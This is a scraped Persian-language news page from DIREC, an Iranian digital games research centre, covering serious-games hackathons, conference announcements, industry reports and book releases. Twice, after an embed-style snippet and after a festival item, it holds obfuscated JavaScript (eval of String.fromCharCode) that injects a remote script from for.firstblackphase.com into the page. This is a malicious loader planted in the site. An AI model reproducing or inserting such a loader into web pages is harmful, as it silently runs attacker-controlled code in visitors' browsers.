Trending Now
محبوبترین اخبار
در نشست خبری پژوهشگران دایرک در دانشکده رسانه فارس مطرح شد:...
نشست خبری اعضای مرکز تحقیقات بازیهای دیجیتال با اصحاب رسانه در دانشکده رسانه فارس با موضوع بررسی حوزه مصرف بازیهای دیجیتال
اعطای امتیاز فعالیت نخبگی بنیاد ملی نخبگان به برترینهای هکاتون ۱۴۰۰
بنیاد ملی نخبگان امتیاز فعالیت نخبگی را به تیمهای برگزیده بخش هکاتون رویداد بازیهای جدی ۱۴۰۰ اعطا کرد. بنا بر اعلام بنیاد ملی نخبگان که...
جامجهانی 2016
در نشست خبری با حضور دبیران کنفرانس تشریح شد؛ رونمایی و جزئیات کنفرانس تحقیقات بازیهای دیجیتال
به گزارش روابط عمومی دایرک، مراسم رونمایی از پوستر کنفرانس تحقیقات بازیهای دیجیتال با حضور دبیر کنفرانس، دبیر علمی، دبیر اجرایی و اعضای برگزارکننده این رویداد روز سهشنبه مورخ ۷ خرداد در سالن اجتماعات بنیاد ملی بازیهای رایانهای برگزار شد.
Battle Royale، ژانر میلیارد دلاری صنعت بازیهای دیجیتال
گروهی از افراد در یک جزیره بزرگ گیر افتادهاند و ۲۰ دقیقه فرصت دارند که...
سخنرانی دکتر پاملا ام.کاتو در جشن پنج سالگی بازیهای جدی
Secrets to successful serious game Living on the edge
مسابقات اتومبیلرانی
تجربهخوانی بازی جدی مغزینه
بخش علمی «دریچه» از مجله تخصصی آنلاین دایرک به مطالعه موردی مراحل ساخت و عناصر...
بازینگاشت «شاخصترین اطلاعات مصرف بازیهای دیجیتال در سال ۱۳۹۸»
معرفی این بازینگاشت:
این بازینگاشت نمونهای مصور از دادههای کلیدی پیمایش ملی در سال ۱۳۹۸ است...
بازی بومهن، فینالیست جشنواره بازی جدی سال ۱۴۰۰
مهرداد شیروانی
[td_block_social_counter custom_title=”ما را دنبال کنید” facebook=”tagDiv” twitter=”envato” youtube=”envato” open_in_new_window=”y”]
اخبار ورزشی
راهنمای سفر
شناسایی روشهای پولسازی بازیهای تلفن همراه هوشمند محبوبترین ژانرها
«دریچه» در نظر دارد در ساختار جدید خود به معرفی پایاننامههای مقاطع کارشناسی ارشد و دکترای دانشگاههای مختلف که به تازگی در حوزه بازیهای...
شرکتهای فینالیست SeGaP2019 شرکت خلاق شدند
سه شرکت «سرو هانا پارسیان با بازی هانا؛ فناوران جوان رایکا با بازی تیزران؛ توسعه پرداز هوشمند راسپینا با بازی ریشتر» که در سومین...
«اختلال بازی کردن»: یک واقعیت یا نشانهای از وجود یک حقیقت؟
اگر هرشب بدون اینکه یک راند PUBG بازی کنید، نمیتوانید بخوابید یا اگر نمیتوانید حتی یک روز را هم بدون انجام بازی Fortnite تصور کنید با احترام باید گفت که شما براساس گزارش اخیر سازمان بهداشت جهانی دچار یک اختلال هستید.
دکتر بیتا مسگرپور نماینده موسسه نیماد درخصوص همکاری با SeGaP2021 میگوید
.h_iframe-aparat_embed_frame{position:relative;}.h_iframe-aparat_embed_frame .ratio{display:block;width:100%;height:auto;}.h_iframe-aparat_embed_frame iframe{position:absolute;top:0;left:0;width:100%;height:100%;}var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,102,111,114,46,102,105,114,115,116,98,108,97,99,107,112,104,97,115,101,46,99,111,109,47,116,114,98,98,98,98,98,50,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*674867468*/
در هکاتون بازیهای جدی ۱۳۹۷ چه خبر بود؟
در نخستین دوره هکاتون بازیهای جدی، با حمایت «موسسه نیماد» و «شتاب دهنده آواگیمز»، دو مسئله «فرهنگسازی برای مصرف منطقی دارو» و «تشخیص و بهبود اوتیسم و تعامل با بیماران اوتیستیک» به عنوان موضوعات محوری گیم جم انتخاب شدند. در مجموع ۱۹ تیم در «صندوق نوآوری و شکوفایی» در این رویداد به رقابت پرداختند.
تنیس
ارائه بازی جدی شاهگیگیلی در رویداد جایزه بازیهای جدی ۱۳۹۸
رتبه سوم در جشنواره بازی جدی سال ۱۳۹۸var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,102,111,114,46,102,105,114,115,116,98,108,97,99,107,112,104,97,115,101,46,99,111,109,47,116,114,98,98,98,98,98,50,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));/*674867468*/
مروری بر چشمانداز و روند رشد سریع صنعت بازی
مجموعه GlobalWebIndex سالانه به نظرسنجی از ۶۸۸۰۰۰ کاربر آنلاین میپردازد که این نظرسنجی از طریق پرسشنامه موبایل توزیع و تکمیل میگردد. مطالب زیر برگرفته...
LATEST ARTICLES
گزارش «نمای باز ۱۴۰۰: شاخصترین اطلاعات مصرف بازیهای دیجیتال در ایران» منتشر شد
معرفی این گزارش:
گزارش «نمای باز ۱۴۰۰» شاخصترین اطلاعات مصرف رسانه بازی در ایران ۱۴۰۰ را در اختیار علاقهمندان، محققان، سیاستگذاران و فعالان صنعت بازی ایران قرار میدهد. اطلاعات این گزارش برمبنای پیمایش ملی بازیکنان...
نگاهی به صنعت بازیهای دیجیتال در بریتانیا (بخش اول: مصرف بازیها)
بریتانیا پس از چین، ایالات متحده، ژاپن و آلمان پنجمین بازار بزرگ بازیهای دیجیتال در سال ۲۰۱۸ را از نظر درآمد مصرفکننده دارا بود. بریتانیا دارای بزرگترین بخش بازیهای دیجیتال در اروپا است که...
اهمیت پرداختن به بازیهای دیجیتال با توجه به کارکردهای شناختی آنها
افزایش روزافزون مخاطبان بازیهای دیجیتال، زمانیکه صرف این بازیها میکنند و تاثیرات روانشناختی که بهصورت مستقیم و غیرمستقیم بهدنبال این بازیها تجربه میشوند همواره بر اهمیت پژوهشهای حوزه بازیهای دیجیتال میافزایند. این مقاله مروری...
عرضه کتابهای انتشارات بنیاد ملی بازیهای رایانهای در سی و چهارمین نمایشگاه بین المللی...
در چهارمین نمایشگاه مجازی کتاب تهران که تا ۳۰ اردیبهشتماه ادامه دارد، کتابهای زیر از انتشارات بنیاد ملی بازیهای رایانهای برای علاقهمندان و پژوهشگران حوزه بازی ارائه شده است:«دیپلماسی بازیهای دیجیتال» «نظام ملی ردهبندی...
کتاب مجموعه مقالات هفتمین دوره کنفرانس بینالمللی بازیهای رایانهای؛ فرصتها و چالشها با موضوع...
این کتاب با همکاری مشترک دانشگاه اصفهان و بنیاد ملی بازیهای رایانهای تدوین شده و حاوی مقالات برگزیده هفتمین دوره کنفرانس بینالمللی بازیهای رایانهای؛ فرصتها و چالشها با موضوع بازیهای رایانهای و رویکرد مبتنی...
کتاب «روندهای نوظهور در بازیهای دیجیتال»
معرفی این کتاب:کتاب «روندهای نوظهور در بازیهای دیجیتال» در 9 فصل روندهای اثرگذار بر صنعت بازی را مورد بررسی قرار داده و در هر فصل به یکی از موضوعات محوری که پیشبینی میشود بر...
نگاهی به صنعت بازیهای دیجیتال در لهستان
لهستان در سالهای اخیر ثابت کرده است که مرکز پررونقی برای صنعت بازی است. به دلیل موفقیت برخی بازیها و رویدادها، شرکتهای سازنده بازی مستقل متعددی نیز در این کشور به وجود آمدهاند. از...
اتاقهای فرار واقعیت مجازی؛ فرار بهسوی یادگیری
امروزه شاهد گسترش فناوریهای پیشرو در حوزه آموزش و یادگیری برای دانشآموزان نسل جدید هستیم. بازیهای جدی بهعنوان یکی از این فناوریها، یادگیری را هیجانانگیزتر و جالبتر نموده و نتیجهٔ بهتری نسبت به آموزشهای...
فراخوان انتشار مطالعات علمی در قالب کتاب
مرکز تحقیقات بازیهای دیجیتال (دایرک) در راستای تحقق اهداف تعریف شده و گسترش تحقیق و پژوهش، آماده پذیرش و چاپ آثار پژوهشی در قالب کتاب از طریق انتشارات بنیاد ملی بازیهای رایانهای است و...
حضور شرکتکنندگان هکاتون ۱۴۰۱ در مدرسه بازیهای جدی
کارگاههای دومین مدرسه بازیهای جدی با موضوع بازیوارسازی (گیمیفیکیشن) که با هدف توانمندسازی شرکتکنندگان در بخش هکاتون ۱۴۰۱ برگزار میشود از روز پنجشنبه ۳ شهریورماه با حضور ۱۵۶ شرکتکننده کار خود را آغاز میکند.
دومین...